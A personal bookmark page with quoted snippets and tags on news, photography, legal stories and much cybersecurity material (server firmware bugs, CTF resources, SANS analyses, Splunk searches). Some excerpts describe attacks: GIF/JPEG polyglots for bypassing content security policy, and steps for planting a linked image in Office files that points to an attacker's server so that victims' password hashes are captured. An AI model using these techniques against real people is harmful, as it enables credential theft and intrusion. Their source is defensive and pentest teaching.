LifePort | Home
Design interiors for custom applications on fixed and rotor wing aircraft
medical  airline  helicoper  military 
10 days ago
A Brain-Eating Amoeba Just Claimed Another Victim | WIRED
Naegleria fowleri are given miltefosine, a highly controlled experimental drug that has shown promise in treating PAM.

symptoms of Naegleria infection look flu-like at first, and later like other, more common forms of meningitis. PAM is very, very rare; since 1962, the CDC has recorded just 143 case reports—
medical  health  bacteria  brain  water 
10 days ago
IBM fired me because I'm not a millennial, says axed cloud sales star in age discrim court row • The Register
Langley, of Texas, USA, was seemingly doing very well for himself within Big Blue. For instance, he netted a $20,000 performance bonus in January 2017, the largest such windfall within his team in Austin, we're told. His annual performance scores put him at the top or near the top of his group.

Curiously, the month before, though, he was warned privately by his boss's boss – Andrew Brown, veep of worldwide sales of IBM's hybrid cloud software – that he needed to look for a new job, it is claimed. At the end of March 2017, Langley was formally told he would be laid off at the end of June.

Langley was laid off after his supervisor Kim Overbay ranked him, in January 2017, as the worst performing person on his team, despite him bagging the biggest bonus that quarter, and earlier meeting or exceeding performance expectations, according to the lawsuit.
ibm  career  ageism  legal 
11 days ago
iDRACula Vulnerability Impacts Millions of Legacy Dell EMC Servers
I am not a security researcher. I will say that Dell EMC did a good job communicating with myself (knowing we would be running a story) and with the individual who took advantage of iDRACula. The server industry has seen a number of severe security issues this year, including the recent Intel L1TF / Foreshadow disclosure. Seeing Dell EMC’s security apparatus work quickly on this was welcome.
dell  motherboard  cybersecurity  vulnerability  drac 
11 days ago
Screwed SAP salesman scores $660,000 jury award • The Register
Its argument? That the salesman only gets paid when the customer pays SAP and that he can only get commissions while still working at the company. So even though he did the work and closed the deals, the company didn't get paid until after it had fired him, so he didn't deserve any compensation.
sap  legal  sales  theregister 
11 days ago
You dirty DRAC: IT bods uncover Dell server firmware security slip • The Register
Jon Sands and Adam Nielsen discovered and reported via Serve The Home a bug dubbed iDRACula because it involves Dell's iDRAC service. iDRAC is software that runs on the baseband management controller (BMC) inside a PowerEdge system independent of whatever hypervisor, operating system, and applications are running.

It has full control over the hardware. Administrators can connect over the network to a server's iDRAC to diagnose and fix up any problems. It's a lot easier to fire up a web browser, and remotely power cycle the box or reinstall its OS, than locate, pull out, repair, and re-rack a system by hand, for instance.

The weakness is said to be present in 12th and 13th Dell EMC PowerEdge generations. The latest machines, 14th-gen and up, are not vulnerable because they introduced a root-of-trust in the BMC processor, meaning only Dell-authorized code can run on the controller, and not junk injected by hackers.
cybersecurity  dell  motherboard  drac  firmware  vulnerability 
11 days ago
The Big Hack: How China Used a Tiny Chip to Infiltrate U.S. Companies - Bloomberg
Apple made its discovery of suspicious chips inside Supermicro servers around May 2015, after detecting odd network activity and firmware problems, according to a person familiar with the timeline. Two of the senior Apple insiders say the company reported the incident to the FBI but kept details about what it had detected tightly held, even internally. Government investigators were still chasing clues on their own when Amazon made its discovery and gave them access to sabotaged hardware, according to one U.S. official. This created an invaluable opportunity for intelligence agencies and the FBI—by then running a full investigation led by its cyber- and counterintelligence teams—to see what the chips looked like and how they worked.

The implant was placed on the board in a way that allowed it to effectively edit this information queue, injecting its own code or altering the order of the instructions the CPU was meant to follow.

telling the device to communicate with one of several anonymous computers elsewhere on the internet that were loaded with more complex code; and preparing the device’s operating system to accept this new code. The illicit chips could do all this because they were connected to the baseboard management controller, a kind of superchip that administrators use to remotely log in to problematic servers, giving them access to the most sensitive code even on machines that have crashed or are turned off.

implanted chips were designed to ping anonymous computers on the internet for further instructions, operatives could hack those computers to identify others who’d been affected. Although the investigators couldn’t be sure they’d found every victim, a person familiar with the U.S. probe says they ultimately concluded that the number was almost 30 companies.

sophisticated designs than they’d previously encountered. In one case, the malicious chips were thin enough that they’d been embedded between the layers of fiberglass onto which the other components were attached

Every Supermicro server, all 7,000 or so, was replaced in a matter of weeks, the senior insider says. (Apple denies that any servers were removed.) In 2016, Apple informed Supermicro that it was severing their relationship entirely—a decision a spokesman for Apple ascribed in response to Businessweek’s questions to an unrelated and relatively minor security incident. That August, Supermicro’s CEO, Liang, revealed that the company had lost two major customers.

A belief formed that China was unlikely to jeopardize its position as workshop to the world by letting its spies meddle in its factories.
“You can have less supply than you want and guarantee it’s secure, or you can have the supply you need, but there will be risk. Every organization has accepted the second proposition.”

In the three years since the briefing in McLean, no commercially viable way to detect attacks like the one on Supermicro’s motherboards has emerged—or has looked likely to emerge.
backdoor  china  motherboard  cybersecurity  supplychain  amazon 
12 days ago
The Big Hack: Inside the Bag of Tech Tricks Used by China Spies - Bloomberg
According to U.S. officials with knowledge of the investigation, operatives from a unit of the People’s Liberation Army inserted the chips during the manufacturing process. U.S. agencies traced the chips to subcontracting factories that built motherboards for a San Jose-based company called Super Micro Computer Inc. In some cases, middlemen—claiming to be Supermicro representatives or suggesting that they had ties to government—approached plant managers. They used bribes or threats of inspections that could slow or halt production to ram through changes to motherboards’ original designs.
supplychain  cybersecurity  china  amazon  hardware  firmware 
12 days ago
CTFs · GitHub
Wiki-like CTF write-ups repository, maintained by the community.
ctf  forensicschallenge  training  cybersecurity 
13 days ago
Bypassing Content Security Policy with a JS/GIF Polyglot (old 2015)
This post explains the creation of a JS/GIF polyglot to bypass Content Security Policy (CSP) in certain scenarios. We will build a custom polyglot file that is a valid GIF as well as JavaScript and use Xenotix to simulate real world exploitation.

Your PoC JS code can be just "alert(0)" or for Red Team Pentesting I would suggest you to use OWASP Xenotix XSS Exploit Framework (as I wrote it) or Beef (an alternative). In this post i will be using Xenotix.

Download Latest Xenotix from http://xenotix.in
polyglot  javascript  gif  xss 
13 days ago
GIF/Javascript Polyglots: Abusing GIFs, tags, and MIME types for evil - Web Hacking - 0x00sec - The Home of the Hacker
use fake webserver source to present application/octet-stream MIME type for image

This uses SimpleHTTPServer, which is already in Python’s standard libraries, to serve the contents of the local directory. By default, SimpleHTTPServer will try and give things appropriate MIME types based on extensions, so we add a smal change to tell it to interpret .gif extensions as application/octect-stream, which browsers will execute. If I named that html file as index.html, I can now hit 5 and get our malicious gif served back with a MIME type that it is okay with executing. The result? We run the JS compiled into the GIF.

This is not a new or novel attack. This is also not something I feel is widely exploitable, but it is fairly sneaky and exposes a few areas of trust that we can abuse.

Browsers do little in the way of actual heuristics when trying to determine file type. At best, they will look at the extension and magic byte to try and determine if the file is what it claims to be.
This is a valid GIF and a valid bit of JS, so heuristics would have to be more sophisticated to catch something like this.
Browsers trust MIME types perhaps a bit too much.
This would be easy to exploit and hard to detect using a site you control, since users wouldn’t be able to see the JS that is being executed.
Then again, they might see that something.js was being executed but might not be able to GET the file to see what is in it.
Obfuscation level: 3/10.
javascript  jpeg  polyglot  cybersecurity 
13 days ago
Bypassing CSP using polyglot JPEGs | Blog
In conclusion if you allow JPEG uploads on your site or indeed any type of file, it's worth placing these assets on a separate domain. When validating a JPEG, you should rewrite the JPEG header to ensure no code is sneaked in there and remove all JPEG comments. Obviously it's also essential that your CSP does not whitelist your image assets domain for script.

This post wouldn't be possible without the excellent work of Ange Albertini. I used his JPEG format graphic extensively to create the polygot JPEG. Jasvir Nagra also inspired me with his blog post about polyglot GIFs.


Mozilla are fixing this in Firefox 51.
polyglot  javascript  jpeg  firefox  cybersecurity 
13 days ago
Practice CTF List / Permanant CTF List
Whether they're being updated, contain high quality challenges, or just have a lot of depth, these are probably where you want to spend the most time.

http://pwnable.tw/ (a newer set of high quality pwnable challenges)
http://pwnable.kr/ (one of the more popular recent wargamming sets of challenges)
https://picoctf.com/ (Designed for high school students while the event is usually new every year, it's left online and has a great difficulty progression)
https://microcorruption.com/login (one of the best interfaces, a good difficulty curve and introduction to low-level reverse engineering, specifically on an MSP430)
http://ctflearn.com/ (a new CTF based learning platform with user-contributed challenges)
ctf  cybersecurity  training  reference  forensicschallenge 
13 days ago
Tools and Resources to Prepare for a Hacker CTF Competition or Challenge
CTF Competitions on Hacker Conferences or Gatherings and Wargames

DEFCON CTF – one of the most prestigious and challenging CTF ever in DEFCON which is currently organized by Legitimate Business Syndicate
picoCTF – a CTF targeted for middle and high school students
Ghost in the Shellcode – an annual CTF which is hosted in ShmooCon Hacker Convention
ROOTCON Campus Tour CTF – is the first ever inter-university CTF challenge in the Philippines which is a open to all college students
ROOTCON CTF – is the official CTF of ROOTCON Hacker Conference
CSAW CTF – by NYU Policy
HSCTF – known to be the first CTF made by high school students and for high school students
UCSB iCTF – the UCSB International Capture The Flag is organized by Prof. Giovanni Vigna of the Department of Computer Science at UCSB, and is held once a year (usually at the beginning of December, but it has been rescheduled a few times)
Infosec Institute CTF – our very own CTF Labs
Smash the Stack – a war gaming network which simulates software vulnerabilities and allows for the legal execution of exploitation techniques
OverTheWire – another war gaming network
Embedded Security CTF
DefCamp CTF – the official CTF of DEFCAMP
Trend Micro CTF Asia Pacific & Japan – a CTF event hosted by Trend Micro
More upcoming events are in CTF Time…

CTF Guides and Resources

Trail of Bits CTF Guide – one of the best guides for newbies
Practice CTF List / Permanent CTF List – a good collection and resource of CTFs that are long-running
Awesome CTF – a curated list of Capture The Flag (CTF) frameworks, libraries, resources and software
Vulnhub – vulnerable machines you can practice or for your pentest laboratory
CTF Resources – a repository and an archive of general topics for CTF and is somehow the same with Trail of Bits CTF Guide
Reddit’s securityCTF – /r/securityCTF
Forensics Wiki – a wiki designed for computer forensics
ctf  resources  reference  training 
13 days ago
LoJax: First UEFI rootkit found in the wild, courtesy of the Sednit group
Caveat: "The tool described above is able to update the system’s firmware only if the SPI flash memory protections are vulnerable or misconfigured. Thus, you should make sure that you are using the latest available UEFI/BIOS available for your motherboard. Also, as the exploited vulnerability affects only older chipsets, make sure that critical systems have modern chipsets with the Platform Controller Hub (introduced with Intel Series 5 chipsets in 2008)."
cybersecurity  uefi  malware  rootkit  bios 
13 days ago
DFRWS 2016 SDN Forensics Challenge
Four teams participated in this year's challenge and did excellent work. Congratulations to the winning team from Booz Allen! A summary of the challenge, scenario details, results, and the winning solution are available for download:

Results Presentation (@DFRWS Seattle Aug, 2016)
Winning submission
sdn  forensics  pcap 
13 days ago
Linksys Worm ("TheMoon") Captured - SANS Internet Storm Center
One important update: This affects other Linksys routers as well. For example, we do have some routers conecting to the honeypot that identify themselves as E2500 (Firmware 1.0.03 build 4)
linksys  malware  sans  forensics  router 
14 days ago
Why and How to Calibrate Your Lenses for Razor-Sharp Autofocus - Petapixel
First, you’ll need to place your camera and selected lens at the appropriate distance from the ruler. This distance is dependent on the focal length of the lens you’re calibrating and the easiest thing to do is check the details on this super handy chart from LensAlign. Their Distance Tool allows you to input your camera sensor size, your focal length and minimum aperture and it’ll give you the optimum distance you’ll need to do the test. Input your numbers and then set up your camera at the appropriate distance as recommends by the site.
petapixel  focus  calibration  camera  howto 
15 days ago
GitHub - salesforce/ja3: JA3 is a standard for creating SSL client fingerprints in an easy to produce and shareable way.
JA3 is a method for creating SSL/TLS client fingerprints that are easy to produce and can be easily shared for threat intelligence.

This repo includes JA3 scripts for Bro and Python.
cybersecurity  ssl  tls  signature 
15 days ago
Rufus - Create bootable USB drives the easy way
Rufus is a utility that helps format and create bootable USB flash drives, such as USB keys/pendrives, memory sticks, etc.
usb  boot  windows  software 
15 days ago
mhassan2 (Mohamad Hassan) · GitHub
Docker Splunk Orchestration script (6,000+ lines) to create fully automated pre-configured splunk site-2-site clusters or stand alone containers for your lab/training. Awesome tool for training and…
splunk  docker  github  script  orchestration 
18 days ago
Popular Weed Killer May Be Responsible for Global Bee Deaths - Motherboard
The chemical glyphosate is the active ingredient in Roundup, a potent herbicide sold by Monsanto, and other similar products. A new study by researchers at the University of Texas at Austin found that it destroys bees’ specialized gut bacteria, exposing them to infection by deadly bacteria.

Glyphosate is the world’s best-selling herbicide, despite its links to cancer in humans. It works by targeting an enzyme in plants and some microorganisms known as EPSPS, or 5-enolpyruvylshikimate-3-phosphate synthase. According to the study, bee gut bacteria also contains this enzyme, which helps to ward off infections and regulate overall health.

When the scientists exposed bees to the Roundup ingredient, the bees’ healthy bacteria decreased, disrupting their microbiome—a mini-ecosystem of gut microbes responsible for all manner of tasks, such as blocking pathogenic invaders and processing food.
bees  microbiome  bacteria  poison  cancer  environment 
19 days ago
A Major Bug In Bitcoin Software Could Have Crashed the Currency - Motherboard
On Tuesday, the developers of Bitcoin Core—the software that effectively powers the Bitcoin blockchain—released a new version that patched a vulnerability that allowed a malicious user to crash the network, making everyone’s digital coins effectively useless. The bug has been variously described as “very scary,” “major,” and one of the “top three or four” most serious bugs ever discovered in Bitcoin.
“For less than $80,000, you could have brought down the entire network,” Emin Gün Sirer, an associate professor of computer science at Cornell University told me over the phone. “That is less money than what a lot of entities would pay for a 0-day attack on many systems. There are many motivated people like this, and they could have brought the network down.”
bitcoin  cryptocurrency  vulnerability 
19 days ago
20/20 malware vision - SANS Internet Storm Center
Here I use Python's map function to calculate the difference between the numerical value of the cleartext string and the obfuscated string:
I can see the difference is always -11. So you just need to substract 11 from each character to get the deobfuscated string (using translate.py):
cybersecurity  forensics  python  visualbasic  malware  todo 
19 days ago
Positive Technologies - learn and secure : Positive Technologies researcher finds vulnerability enabling disclosure of Intel ME encryption keys
Intel has issued a patch in response to a serious vulnerability in Intel ME firmware discovered by Positive Technologies expert Dmitry Sklyarov. The vulnerability involved security mechanisms in the MFS file system, which Intel ME uses to store data. By exploiting this flaw, attackers could manipulate the state of MFS and extract important secrets
intel  cybersecurity  vulnerability  cpu 
19 days ago
Dissecting Malicious MS Office Docs - SANS Internet Storm Center
office documents are essentially zipped-up xml files.  In native powershell you'd execute:

$targetfile = "C:\full\path\to\doc.docx"
$word = New-Object -ComObject Word.Application
$doc = $word.documents.open($targetfile)
$xmlout = New-Object System.XML.XMLDocument
$xmlout = [xml]$doc.WordOpenXML
$targetrel = $xmlout.package.part.xmlData.Relationships.Relationship
$targetrel | ft

L:\cust\sans\isc\honeydoc> $targetrel | fl | sls "\\"
Target     : file:///\\\test\cmd.png

Note that the full path seems to be needed in $targetfile - ("./" doesn't cut it as a path.)

WARNING - using the com object word.application actually opens the file using the application, so this actually opens word and then triggers the attack, sending the password hash of the account in use

A better approach might be to use DocumentFormat.OpenXML. Before you go there, you'll need to install the OpenXML SDK first, find it at https://www.microsoft.com/en-us/download/details.aspx?id=30425

A script using this method might look like:

[System.Reflection.Assembly]::LoadFrom("C:\Program Files (x86)\Microsoft Office\Office15\DCF\DocumentFormat.OpenXml.dll")
$file="L:\cust\sans\isc\honeydoc\smb trap 4.docx"
$doc = [DocumentFormat.OpenXml.Packaging.WordprocessingDocument]::Open($file,$true)
$targets = $doc.MainDocumentPart.ExternalRelationships
$targets | fl | grep "file://"
Uri : file://

At this point you can dissect things even further:
PS L:\cust\sans\isc\honeydoc> $targets.Uri

AbsolutePath : /test/cmd.png
AbsoluteUri : file://
LocalPath : \\\test\cmd.png
Authority :
HostNameType : IPv4
IsDefaultPort : True
IsFile : True
IsLoopback : False
PathAndQuery : /test/cmd.png
Segments : {/, test/, cmd.png}
IsUnc : True
Host :
Port : -1
Query :
Fragment :
Scheme : file
OriginalString : file:///\\\test\cmd.png
DnsSafeHost :
IdnHost :
IsAbsoluteUri : True
UserEscaped : False
UserInfo :

Adding these 2 lines to the script fills the "just give me the malicious host" requirement:

foreach ($t in $targets) {
if ($t.uri.isunc) {echo $t.uri.Host}
cybersecurity  msoffice  forensics  script  powershell  todo 
19 days ago
Using Certificate Transparency as an Attack / Defense Tool - SANS Internet Storm Center
Anyway, the Cert Transparency program has Certifficate Authorities keeping a transparent log of EV certificates since Jan 1, 2015, and logs for DV and OV certificates as of May 2, 2018 (more here: https://www.certificate-transparency.org/ ).  This means that there are central, queriable repo's for all SSL certificates.  As soon as I hear "central database" and "API", I tend to ask "how can I use that for other purposes" - for instance, how I use that in Penetration Tests?

https://crt.sh/?q=sans.org gets us a nice list of certs

Entrust interface at https://www.entrust.com/ct-search/ is a bit easier to navigate, but doesn't have that easy ability to translate a browser based query to a curl or other script based approach.

Where else can you find a decent interface to a certificate transparency feed? So far, I've been using:

This gives you pretty much everything, including the ability to download the certificates themselves, export to excel or csv.

Of course there's a Google interface to search certificates. And of course it's extremely complete - if there's info to find, it'll be easy to find in this one!
tls  certificates  cybersecurity  threathunting  pentest 
19 days ago
Let's Trade: You Read My Email, I'll Read Your Password! - SANS Internet Storm Center
ow do you place a link like this? In MS Word for instance:

Insert / Picture - point the link to \\ip.of.your.evil.server\share\filename
This file does need to exist in curent versions of word - I tend to just change my laptop's IP temporarily for this step
Resize this file so that it's small enough to be missed as the client looks at the document.
Be sure to choose "insert and link" - this will force the graphic to update when you open the file.

When your victim / customer opens the file, they'll send their credentials (userid and password hash) to your server. This shows that information being recveived in Responder:

Works in Word, Excel, PowerPoint, Publisher, etc..
cybersecurity  windows  msoffice  smb  pentest  password 
19 days ago
Certificates Revisited - SSL VPN Certificates 2 Ways - SANS Internet Storm Center
all the certificates for the Cisco AnyConnect VPN profiles in your list? That'd be handy to head off those emergency cert expiry calls.

First of all, AnyConnect profiles are all stored as XML files in C:\ProgramData\Cisco\Cisco AnyConnect Secure Mobility Client\Profile, which means we can get the list in PowerShell like this:
powershell  cisco  vpn  tls 
19 days ago
The danger of sending information for API consumption without adequate security measures - SANS Internet Storm Center
API that is consumed to perform the authentication of a fingerprint that was read through an APP located in a mobile phone. The fingerprint is digitalized using the Wavelet Scalar Quantization (WSQ) Gray-scale Fingerprint Image Compression Algorith
fingerprint  cybersecurity  api  biometrics 
19 days ago
Encrypting SNI: Fixing One of the Core Internet Bugs
One solution to this problem was to create certificates with multiple Subject Alternative Names (SANs). These certificates would encrypt traffic for multiple domains that could all be hosted on the same IP. This is how Cloudflare handles HTTPS traffic from older browsers that don't support SNI. We limit that feature to our paying customers, however, for the same reason that SANs aren't a great solution: they're a hack, a pain to manage, and can slow down performance if they include too many domains.

The more scalable solution was SNI. The analogy that makes sense to me is to think of a postal mail envelope. The contents inside the envelope are protected and can't be seen by the postal carrier. However, outside the envelope is the street address which the postal carrier uses to bring the envelope to the right building. On the Internet, a web server's IP address is the equivalent of the street address.

In the United States, ISPs were briefly restricted in their ability to gather customer browsing data under FCC rules passed at the end of the Obama administration. ISPs, however, lobbied Congress and, in April 2017, President Trump signed a Congressional Resolution repealing those protections. As ISPs increasingly acquire media companies and ad targeting businesses, being able to mine the data flowing through their pipes is an increasingly attractive business for them and an increasingly troubling privacy threat to all of us.
cybersecurity  privacy  tls  dns  cloudflare 
20 days ago
Hunting for Suspicious Processes with OSSEC - SANS Internet Storm Center
OSSEC is a free security monitoring tool/log management platform which has many features related to detecting malicious activity on a live system like the rootkit detection or syscheck modules. Here is an example of rules that can be deployed to track malicious processes running on a host (it can be seen as an extension of the existing rootkit detection features).
threathunting  cybersecurity  monitoring  ossec 
20 days ago
Where have all my Certificates gone? (And when do they expire?) - SANS Internet Storm Center
ran theharvester (it's part of Kali) to find the *other* bits and pieces of infrastructure that might be in play.
Theharvester is a nice open source intelligence tool starts with various search
cybersecurity  tls  cert  kali  howto 
20 days ago
Review: 6 slick open source routers | InfoWorld
DD-WRT, Tomato, OpenWrt, OPNsense, PFSense, and VyOS suit a wide range of devices and networking needs
router  software  foss  cybersecurity 
25 days ago
YouTube now supports 4k-resolution videos - CNET
Thought 1080p video on YouTube was big? Think bigger. (JULY 9, 2010)

YouTube on Friday announced that its player now supports 4k, a standard resolution for films that measures 4096x3072 pixels. As YouTube Engineer Ramesh Sarukkai explained in the announcement on YouTube's official blog, "4K is nearly four times the size of 1080p," and it dwarfs even Imax, which projects films in the slightly smaller 2k format, with its 2048×1080-pixel resolution
4k  youtube  history 
26 days ago
3 Ways A.I. and AR Will Transform Your Company | Inc.com
The greatest ideas hardly ever come from using 20% time away from work. They hardly ever come from the innovation lab. They come from busy people who had ideas while doing their day job, stayed late, and tried things without getting permission. They don't come from companies who drive innovation. They don't come from companies who celebrate innovation. But they come from companies who allow their people to try new things and fail without consequences. They come from companies that have the right climate for employees to be creative. They come from people who do those things that allow them to generate great ideas. 
innovation  google 
27 days ago
The Best Laser Printer for 2018 - Reviews.com
HP take both of our top spots. While the brand receives recognition for its reliability...took our top spot for black and white laser printer because it was straightforward to use and produced the most precise text and lines.

Brother L2340dw as the more popular option for black and white printers...the printers are direct clones of each other and can even hold each other's paper trays. With no discernible difference except for the cheaper price of the Dell, we recommend the Dell 5310dw.

HP LaserJet Pro M203dw Printer = Black-and-White Laser Printer
HP Color LaserJet Pro M252dw = Color Laser Printer
Dell E310dw / Brother L2340 = Budget Printer
Canon Color imageCLASS LBP612Cdw = Precise Color Tones
printer  review  laserprinter  shopping 
4 weeks ago
Balmhorn - Bing
Mountaineers on the Balmhorn, Switzerland
mountaineering  switzerland  photo 
5 weeks ago
Moskenes, Norway - Bing
Looking toward Mt. Olstinden in Moskenes, Norway
norway  moskenes  lofoten  bing  photo 
5 weeks ago
Use Test-NetConnection to Replace Ping > Think PowerShell
PS C:\Users\aaron> Test-NetConnection -ComputerName thinkpowershell.com -Port 443

ComputerName : thinkpowershell.com
RemoteAddress :
RemotePort : 443
InterfaceAlias : Ethernet 2
SourceAddress :
PingSucceeded : True
PingReplyDetails (RTT) : 44 ms
TcpTestSucceeded : True

PS C:\Users\aaron> If (Test-NetConnection -ComputerName thinkpowershell.com -Port 443 -InformationLevel Quiet) {
Write-Host "thinkpowershell.com is listening on port 443."
thinkpowershell.com is listening on port 443.
powershell  techsupport  networking 
5 weeks ago
Researchers Detail Two New Attacks on TPM Chips
The attack scenario involves an attacker abusing power interrupts and TPM state restores to obtain valid hashes for components involved in the boot-up process, which the attacker then feeds back to the same SRTM-configured TPM, tricking it into thinking its running on non-tampered components.
tpm  cybersecurity  vulnerability 
5 weeks ago
Attorney For Homeless Man: All The Money In GoFundMe Fundraiser For Him Is Gone | Daily Wire
defense attorney said that Bobbitt received $200,000 dollars from the money donated.

McClure and D'Amico set up the GoFund Me with claims they would buy Bobbitt a house and set up two trusts. It never happened.”
...used to take expensive trips, go on shopping sprees, and gamble.
...used BMW John Bobbitt says the couple purchased earlier this year. He suspects the GoFundMe $ raised for him was used to buy it
homeless  gofundme  scandal 
5 weeks ago
Splunk Enterprise Security: How to remove a notable event from the "Security Posture" dashboard after investigation? - Question | Splunk Answers
set search condition: status_group="New"

| `es_notable_events` | search timeDiff_type=current status_group="New" | stats sparkline(sum(count),30m) as sparkline,sum(count) as count by rule_name | sort 100 - count
5 weeks ago
ThreatStream Matches As Notable Events in Splunk? Here's How...
The search looks like this:

| `ts_tstats_all` | `ts_lookup_details` | `ts_get_time_offset(_time, ts_date_last)` | where ts_confidence >= 80 AND Age < 31 AND (like(ts_itype, "apt%") OR like(ts_itype, "c2%") OR like(ts_itype, "mal%")) | eval orig_sourcetype=sourcetype
splunk  anomali  threatstream  threathunting  cyberthreatintel 
5 weeks ago
Building Integrations for Splunk Enterprise Security | Splunk
Splunk ES - includes prepackaged dashboards, correlations, and incident response workflows to help security teams analyze and respond to their network, endpoint, access, malware, vulnerability, and identity information.

Use Frameworks: Notable Events, Asset & Identity, Threat Intelligence, Risk, Adaptive Response
splunk  cybersecurity  siem  threathunting 
5 weeks ago
« earlier      
abortion adventure advertising advice apple architecture art article audio automobile awesome backup baltimore beauty blackandwhite blog book books business california camera camping canon catholic chasejarvis climbing code collab compsci copyright crypto culture cybersecurity darkroom dc death design development diy dod download eats editorial edu education election08 email europe events exercise facebook fashion film filmphotography firefox flash flickr food forensics foss free friends fuji gallery gear german germany google gps guns hack hacking hacks hawaii health hiking history home hotel howto humor inspiration international internet interview iphone iran iraq italy java landscape language laptop largeformat law legal lens life lighting lightroom linux magazine map maps maryland md microsoft military mobile model money monterey motorcycle movie mp3 music nature networking news norway npr nude nyc obama omaha outdoors panorama pdf people perl petapixel philosophy photo photographer photography photos photoshop php plugin polaroid politics portfolio portrait postprocessing printing privacy productivity programming psychology quote quotes radio realestate ref reference relationships religion rental research review ronpaul running sailing science search seattle security server service shopping society software strobist studio stuttgart switzerland tech techsupport threathunting tips todo tools toread training trance travel tutorial tv video vimeo visualization volunteer war web web2.0 website wedding wifi windows windoze wireless women wordpress youtube

Copy this bookmark: